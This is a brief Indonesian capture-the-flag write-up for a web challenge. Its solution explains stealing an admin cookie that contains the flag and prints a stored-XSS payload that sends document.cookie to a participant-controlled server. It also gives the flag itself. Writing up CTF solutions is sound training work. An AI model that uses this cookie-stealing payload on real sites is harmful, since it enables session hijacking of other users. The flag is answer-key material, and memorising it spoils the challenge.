# Kuenya Kaka

# Deskripsi

    protergo sedang membuat sebuah fitur bantuan untuk para calon karyawan yang butuh pertolongan.

# Solusi

Para peserta diminta untuk membuat sebuah payload script javascript berbahaya yang isinya untuk mencuri cookie admin yang berisi flag, peserta bisa mendapatkan payload dari google atau merancang sendiri

    <script>window.location.href='http://server_peserta.com/?bebas='+document.cookie;</script>

flag : protergo{nih_kue_buat_kamu}